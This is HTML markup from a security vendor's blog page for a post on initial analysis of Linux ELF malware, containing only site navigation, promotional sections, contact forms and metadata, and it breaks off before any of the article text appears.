	<li id="menu-item-114" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-114 nav-item"><a class="nav-link" href="https://www.intezer.com/contact-us/">Contact Us</a></li>
	<li id="menu-item-3061" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3061 nav-item"><a class="nav-link" href="https://www.intezer.com/partners/">Partners</a></li>
	<li id="menu-item-7096" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7096 nav-item"><a class="nav-link" href="https://www.intezer.com/intezer-news/">News</a></li>
	<li id="menu-item-8417" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8417 nav-item"><a class="nav-link" href="https://www.intezer.com/careers/">Careers</a></li>
</ul>
</li>
<li id="menu-item-24859" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24859 nav-item"><a class="nav-link" href="https://www.intezer.com/pricing/">Pricing</a></li>
<li id="menu-item-22200" class="desktop-login menu-item menu-item-type-custom menu-item-object-custom menu-item-22200 nav-item"><a class="nav-link" target="_blank" href="https://analyze.intezer.com/sign-in/?utm_campaign=login-btn&#038;utm_source=intezer">Log in</a></li>
<li id="menu-item-1028" class="try-now desktop-cta menu-item menu-item-type-custom menu-item-object-custom menu-item-1028 nav-item"><a class="nav-link" target="_blank" href="https://analyze.intezer.com/"><span class="glyphicon Try it Now"></span>&nbsp;Sign up</a></li>
<li id="menu-item-5106" class="try-now mobile-cta menu-item menu-item-type-custom menu-item-object-custom menu-item-5106 nav-item"><a class="nav-link" target="_blank" href="https://analyze.intezer.com/"><span class="glyphicon Try our free Community Edition"></span>&nbsp;Sign up</a></li>
</ul>                  
                </div>

        </nav>
 		<section data-elementor-type="section" data-elementor-id="16929" class="elementor elementor-16929">
					<div class="elementor-section-wrap">
								<section class="elementor-section elementor-top-section elementor-element elementor-element-d8295c2 elementor-hidden-tablet elementor-hidden-mobile elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="d8295c2" data-element_type="section" id="analyze-pop" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}">
						<div class="elementor-container elementor-column-gap-wide">
							<div class="elementor-row">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1195e9a" data-id="1195e9a" data-element_type="column">
			<div class="elementor-column-wrap elementor-element-populated">
							<div class="elementor-widget-wrap">
						<section class="elementor-section elementor-inner-section elementor-element elementor-element-a9b9c3b elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="a9b9c3b" data-element_type="section">
						<div class="elementor-container elementor-column-gap-no">
							<div class="elementor-row">
					<div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-ebed2f0" data-id="ebed2f0" data-element_type="column">
			<div class="elementor-column-wrap elementor-element-populated">
							<div class="elementor-widget-wrap">
						<div class="elementor-element elementor-element-dd715e2 elementor-widget elementor-widget-image" data-id="dd715e2" data-element_type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
			<style>/*! elementor - v3.6.3 - 12-04-2022 */
.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=".svg"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>					<div class="elementor-image">
													<a href="https://www.intezer.com/intezer-analyze/">
							<img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/elementor/thumbs/logo-analize-logo-trans-ozsmvqchu4xq3efimwjdhr1x8rgjihbqxejnle9j9u.png" title="logo-analize-logo-trans" alt="Intezer Analyze" />								</a>
														</div>
						</div>
				</div>
				<div class="elementor-element elementor-element-43be782 elementor-widget elementor-widget-heading" data-id="43be782" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
			<style>/*! elementor - v3.6.3 - 12-04-2022 */
.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><div class="elementor-heading-title elementor-size-default"><b>Autonomous security operations</b><br>Focus your SecOps on unique and real incidents instead of repetitive threats and false positives.</div>		</div>
				</div>
						</div>
					</div>
		</div>
				<div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-c353d36" data-id="c353d36" data-element_type="column">
			<div class="elementor-column-wrap elementor-element-populated">
							<div class="elementor-widget-wrap">
						<div class="elementor-element elementor-element-7706e29 museo500 elementor-widget elementor-widget-heading" data-id="7706e29" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
			<h2 class="elementor-heading-title elementor-size-default">Top Industries</h2>		</div>
				</div>
				<div class="elementor-element elementor-element-42b2532 pop-list star-list elementor-widget elementor-widget-text-editor" data-id="42b2532" data-element_type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
			<style>/*! elementor - v3.6.3 - 12-04-2022 */
.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:#818a91;color:#fff}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap{color:#818a91;border:3px solid;background-color:transparent}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap{margin-top:8px}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap-letter{width:1em;height:1em}.elementor-widget-text-editor .elementor-drop-cap{float:left;text-align:center;line-height:1;font-size:50px}.elementor-widget-text-editor .elementor-drop-cap-letter{display:inline-block}</style>					<div class="elementor-text-editor elementor-clearfix">
				<ul><li>Finance</li><li>Manufacturing</li><li>Telecom</li><li>Government</li><li>Retail</li><li>Energy</li></ul>					</div>
						</div>
				</div>
						</div>
					</div>
		</div>
								</div>
					</div>
		</section>
				<section class="elementor-section elementor-inner-section elementor-element elementor-element-59d8717 elementor-section-content-bottom elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="59d8717" data-element_type="section">
						<div class="elementor-container elementor-column-gap-no">
							<div class="elementor-row">
					<div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-d1caad7" data-id="d1caad7" data-element_type="column">
			<div class="elementor-column-wrap elementor-element-populated">
							<div class="elementor-widget-wrap">
						<div class="elementor-element elementor-element-8616ac1 elementor-align-left elementor-mobile-align-center elementor-widget elementor-widget-button" data-id="8616ac1" data-element_type="widget" id="pop-link" data-widget_type="button.default">
				<div class="elementor-widget-container">
					<div class="elementor-button-wrapper">
			<a href="https://www.intezer.com/intezer-analyze/" class="elementor-button-link elementor-button elementor-size-sm" role="button">
						<span class="elementor-button-content-wrapper">
						<span class="elementor-button-text">Learn More</span>
		</span>
					</a>
		</div>
				</div>
				</div>
						</div>
					</div>
		</div>
				<div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-565e380" data-id="565e380" data-element_type="column">
			<div class="elementor-column-wrap elementor-element-populated">
							<div class="elementor-widget-wrap">
						<div class="elementor-element elementor-element-d956561 elementor-align-left elementor-mobile-align-center main-menu-button elementor-widget elementor-widget-button" data-id="d956561" data-element_type="widget" data-widget_type="button.default">
				<div class="elementor-widget-container">
					<div class="elementor-button-wrapper">
			<a href="https://www.intezer.com/book-a-demo-analyze/" target="_blank" class="elementor-button-link elementor-button elementor-size-xs" role="button" id="get-started-analyze">
						<span class="elementor-button-content-wrapper">
						<span class="elementor-button-text">Get a Demo</span>
		</span>
					</a>
		</div>
				</div>
				</div>
						</div>
					</div>
		</div>
								</div>
					</div>
		</section>
						</div>
					</div>
		</div>
								</div>
					</div>
		</section>
							</div>
				</section>
		    </header>
<div class="popup"><div role="form" class="wpcf7" id="wpcf7-f468-o1" lang="en-US" dir="ltr">
<div class="screen-reader-response"><p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul></div>
<form action="/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#wpcf7-f468-o1" method="post" class="wpcf7-form init clearfix" novalidate="novalidate" data-status="init" id="request-demo-form">
<div style="display: none;">
<input type="hidden" name="_wpcf7" value="468" />
<input type="hidden" name="_wpcf7_version" value="5.5.6" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f468-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="hidden" name="_wpcf7cf_hidden_group_fields" value="" />
<input type="hidden" name="_wpcf7cf_hidden_groups" value="" />
<input type="hidden" name="_wpcf7cf_visible_groups" value="" />
<input type="hidden" name="_wpcf7cf_repeaters" value="[]" />
<input type="hidden" name="_wpcf7cf_steps" value="{}" />
<input type="hidden" name="_wpcf7cf_options" value="{&quot;form_id&quot;:468,&quot;conditions&quot;:[{&quot;then_field&quot;:&quot;group-570&quot;,&quot;and_rules&quot;:[{&quot;if_field&quot;:&quot;mx_Country&quot;,&quot;operator&quot;:&quot;equals&quot;,&quot;if_value&quot;:&quot;United States&quot;}]}],&quot;settings&quot;:{&quot;animation&quot;:&quot;yes&quot;,&quot;animation_intime&quot;:200,&quot;animation_outtime&quot;:200,&quot;conditions_ui&quot;:&quot;normal&quot;,&quot;notice_dismissed&quot;:false,&quot;notice_dismissed_rollback-cf7-5.5.3&quot;:true,&quot;notice_dismissed_rollback-cf7-5.5.4&quot;:true}}" />
<input type="hidden" name="_wpcf7_recaptcha_response" value="" />
</div>
<div class="form-header"></div>
<div class="cf-field cf-field-left cf-fname">
<span class="cf-label">First Name</span><br />
<span class="wpcf7-form-control-wrap FirstName"><input type="text" name="FirstName" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required fname w-98" aria-required="true" aria-invalid="false" /></span>
</div>
<div class="cf-field cf-lname">
<span class="cf-label">Last Name</span><br />
<span class="wpcf7-form-control-wrap LastName"><input type="text" name="LastName" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required w-98" aria-required="true" aria-invalid="false" /></span>
</div>
<div class="cf-field cf-field-left cf-title">
<span class="cf-label">Job Title</span><br />
<span class="wpcf7-form-control-wrap JobTitle"><input type="text" name="JobTitle" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required w-98" aria-required="true" aria-invalid="false" /></span>
</div>
<div class="cf-field cf-company">
<span class="cf-label">Company</span><br />
<span class="wpcf7-form-control-wrap Company"><input type="text" name="Company" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required company" aria-required="true" aria-invalid="false" /></span>
</div>
<div class="cf-field cf-field-left">
<span class="cf-label">Email</span><br />
<span class="wpcf7-form-control-wrap EmailAddress"><input type="email" name="EmailAddress" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email email" aria-required="true" aria-invalid="false" /></span>
</div>
<div class="cf-field">
<span class="cf-label">Country</span><br />
<span class="wpcf7-form-control-wrap mx_Country"><select name="mx_Country" class="wpcf7-form-control wpcf7-select wpcf7-validates-as-required country" aria-required="true" aria-invalid="false"><option value=""></option><option value="United States">United States</option><option value="Canada">Canada</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Brazil">Brazil</option><option value="Brunei">Brunei</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Democratic Republic of the Congo (Kinshasa)">Democratic Republic of the Congo (Kinshasa)</option><option value="Congo, Republic of(Brazzaville)">Congo, Republic of(Brazzaville)</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czechia">Czechia</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="East Timor (Timor-Leste)">East Timor (Timor-Leste)</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Grenada">Grenada</option><option value="Guatemala">Guatemala</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran, Islamic Republic of">Iran, Islamic Republic of</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Ivory Coast">Ivory Coast</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="Korea, Democratic People&#039;s Republic of(North Korea)">Korea, Democratic People&#039;s Republic of(North Korea)</option><option value="Korea, Republic of">Korea, Republic of</option><option value="Kosovo">Kosovo</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Lao People&#039;s Democratic Republic">Lao People&#039;s Democratic Republic</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macau">Macau</option><option value="Macedonia, Rep. of">Macedonia, Rep. of</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mexico">Mexico</option><option value="Micronesia, Federal States of">Micronesia, Federal States of</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar, Burma">Myanmar, Burma</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestinian territories">Palestinian territories</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Saint Kitts and Nevis">Saint Kitts and Nevis</option><option value="Saint Lucia">Saint Lucia</option><option value="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Sudan">South Sudan</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syria, Syrian Arab Republic">Syria, Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Tibet">Tibet</option><option value="Togo">Togo</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Vatican City State (Holy See)">Vatican City State (Holy See)</option><option value="Venezuela">Venezuela</option><option value="Vietnam">Vietnam</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></span></p>
<div data-id="group-570" data-orig_data_id="group-570" data-clear_on_hide data-class="wpcf7cf_group">
 <span class="wpcf7-form-control-wrap mx_State"><select name="mx_State" class="wpcf7-form-control wpcf7-select wpcf7-validates-as-required country" aria-required="true" aria-invalid="false"><option value="">Select State</option><option value="Alabama">Alabama</option><option value="Alaska">Alaska</option><option value="American Samoa">American Samoa</option><option value="Arizona">Arizona</option><option value="Arkansas">Arkansas</option><option value="California">California</option><option value="Colorado">Colorado</option><option value="Connecticut">Connecticut</option><option value="Delaware">Delaware</option><option value="District of Columbia">District of Columbia</option><option value="Florida">Florida</option><option value="Georgia">Georgia</option><option value="Guam">Guam</option><option value="Hawaii">Hawaii</option><option value="Idaho">Idaho</option><option value="Illinois">Illinois</option><option value="Indiana">Indiana</option><option value="Iowa">Iowa</option><option value="Kansas">Kansas</option><option value="Kentucky">Kentucky</option><option value="Louisiana">Louisiana</option><option value="Maine">Maine</option><option value="Maryland">Maryland</option><option value="Massachusetts">Massachusetts</option><option value="Michigan">Michigan</option><option value="Minnesota">Minnesota</option><option value="Mississippi">Mississippi</option><option value="Missouri">Missouri</option><option value="Montana">Montana</option><option value="Nebraska">Nebraska</option><option value="Nevada">Nevada</option><option value="New Hampshire">New Hampshire</option><option value="New Jersey">New Jersey</option><option value="New Mexico">New Mexico</option><option value="New York">New York</option><option value="North Carolina">North Carolina</option><option value="North Dakota">North Dakota</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Ohio">Ohio</option><option value="Oklahoma">Oklahoma</option><option value="Oregon">Oregon</option><option value="Pennsylvania">Pennsylvania</option><option value="Puerto Rico">Puerto Rico</option><option value="Rhode Island">Rhode Island</option><option value="South Carolina">South Carolina</option><option value="South Dakota">South Dakota</option><option value="Tennessee">Tennessee</option><option value="Texas">Texas</option><option value="United States Minor Outlying Islands">United States Minor Outlying Islands</option><option value="Utah">Utah</option><option value="Vermont">Vermont</option><option value="Virgin Islands">Virgin Islands</option><option value="Virginia">Virginia</option><option value="Washington">Washington</option><option value="West Virginia">West Virginia</option><option value="Wisconsin">Wisconsin</option><option value="Wyoming">Wyoming</option></select></span>
</div>
</div>
<div class="cf-field cf-field-left">
<span class="cf-label">Phone</span><br />
<span class="wpcf7-form-control-wrap mx_phone"><input type="tel" name="mx_phone" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-tel wpcf7-validates-as-required wpcf7-validates-as-tel w-98" aria-required="true" aria-invalid="false" /></span>
</div>
<input type="hidden" name="form-title" value="" class="wpcf7-form-control wpcf7-hidden form-title" />
<div class="cf-field">
<input type="submit" value="Submit" class="wpcf7-form-control has-spinner wpcf7-submit btn btn-primary" />
</div>
<p><script>
document.addEventListener( 'wpcf7mailsent', function( event ) {
 window.dataLayer.push({
 "event" : "request-submission",
 "formId" : event.detail.contactFormId,
 "response" : event.detail.inputs
 })
}); 
</script></p>
<div class="wpcf7-response-output" aria-hidden="true"></div></form></div></div>



<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "Article",
  "mainEntityOfPage": {
    "@type": "WebPage",
    "@id": "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/"
  },
  "headline": "ELF Malware Analysis 101 Part 2: Initial Analysis ",
  "image": "https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1-1024x475.jpg",  
  "author": {
    "@type": "Organization",
    "name": "Intezer"
  },  
  "publisher": {
    "@type": "Organization",
    "name": "Intezer",
    "logo": {
      "@type": "ImageObject",
      "url": "https://149520725.v2.pressablecdn.com/wp-content/uploads/2019/02/Round-Logo-60x60.jpg",
      "width": 50,
      "height": 50
    }
  },
  "datePublished": "2020-08-19"
}
</script>





	<div id="primary" class="content-area">
	    <div class="container">
		    <div class="single-post-page">
				<h1 class="entry-title t-dianne">ELF Malware Analysis 101 Part 2: Initial Analysis </h1><div class="row top-meta"><div class="col-md-12"><div class="author-box clearfix"><img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/IMG_20200610_100615-60x60.jpg" class="user-photo"><div class="user-bio"><span class="author-light">Written by </span><span class="author-name"> Avigayil Mechtinger</span><span class="author-date"> - 19 August 2020</span></div></div></div><div class="main-blog-image"><img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1-1024x475.jpg" class="featured-img"></div></div><div class="row blog-cont"><div class="col-md-2 blog-side"><div class="blog-side-subscribe"><div role="form" class="wpcf7" id="wpcf7-f15120-o2" lang="en-US" dir="ltr">
<div class="screen-reader-response"><p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul></div>
<form action="/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#wpcf7-f15120-o2" method="post" class="wpcf7-form init" novalidate="novalidate" data-status="init">
<div style="display: none;">
<input type="hidden" name="_wpcf7" value="15120" />
<input type="hidden" name="_wpcf7_version" value="5.5.6" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f15120-o2" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="hidden" name="_wpcf7cf_hidden_group_fields" value="" />
<input type="hidden" name="_wpcf7cf_hidden_groups" value="" />
<input type="hidden" name="_wpcf7cf_visible_groups" value="" />
<input type="hidden" name="_wpcf7cf_repeaters" value="[]" />
<input type="hidden" name="_wpcf7cf_steps" value="{}" />
<input type="hidden" name="_wpcf7cf_options" value="{&quot;form_id&quot;:15120,&quot;conditions&quot;:[{&quot;then_field&quot;:&quot;group-570&quot;,&quot;and_rules&quot;:[{&quot;if_field&quot;:&quot;mx_Country&quot;,&quot;operator&quot;:&quot;equals&quot;,&quot;if_value&quot;:&quot;United States&quot;}]}],&quot;settings&quot;:{&quot;animation&quot;:&quot;yes&quot;,&quot;animation_intime&quot;:200,&quot;animation_outtime&quot;:200,&quot;conditions_ui&quot;:&quot;normal&quot;,&quot;notice_dismissed&quot;:false,&quot;notice_dismissed_rollback-cf7-5.5.3&quot;:true,&quot;notice_dismissed_rollback-cf7-5.5.4&quot;:true}}" />
<input type="hidden" name="_wpcf7_recaptcha_response" value="" />
</div>
<div class="form-header"></div>
<div class="cf-field cf-field-left cf-fname">
<span class="cf-label">First Name</span><br />
<span class="wpcf7-form-control-wrap FirstName"><input type="text" name="FirstName" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required fname w-98" aria-required="true" aria-invalid="false" placeholder="First Name" /></span>
</div>
<div class="cf-field cf-lname">
<span class="cf-label">Last Name</span><br />
<span class="wpcf7-form-control-wrap LastName"><input type="text" name="LastName" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required w-98" aria-required="true" aria-invalid="false" placeholder="Last Name" /></span>
</div>
<div class="cf-field cf-field-left cf-title">
<span class="cf-label">Job Title</span><br />
<span class="wpcf7-form-control-wrap JobTitle"><input type="text" name="JobTitle" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required w-98" aria-required="true" aria-invalid="false" placeholder="Job Title" /></span>
</div>
<div class="cf-field cf-company">
<span class="cf-label">Company</span><br />
<span class="wpcf7-form-control-wrap Company"><input type="text" name="Company" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required company" aria-required="true" aria-invalid="false" placeholder="Company" /></span>
</div>
<div class="cf-field cf-field-left">
<span class="cf-label">Business Email</span><br />
<span class="wpcf7-form-control-wrap EmailAddress"><input type="email" name="EmailAddress" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email email" aria-required="true" aria-invalid="false" placeholder="Business Email" /></span>
</div>
<div class="cf-field">
<span class="cf-label">Country</span><br />
<span class="wpcf7-form-control-wrap mx_Country"><select name="mx_Country" class="wpcf7-form-control wpcf7-select wpcf7-validates-as-required country" aria-required="true" aria-invalid="false"><option value="">Country</option><option value="United States">United States</option><option value="Canada">Canada</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Brazil">Brazil</option><option value="Brunei">Brunei</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Democratic Republic of the Congo (Kinshasa)">Democratic Republic of the Congo (Kinshasa)</option><option value="Congo, Republic of(Brazzaville)">Congo, Republic of(Brazzaville)</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czechia">Czechia</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="East Timor (Timor-Leste)">East Timor (Timor-Leste)</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Grenada">Grenada</option><option value="Guatemala">Guatemala</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran, Islamic Republic of">Iran, Islamic Republic of</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Ivory Coast">Ivory Coast</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="Korea, Democratic People&#039;s Republic of(North Korea)">Korea, Democratic People&#039;s Republic of(North Korea)</option><option value="Korea, Republic 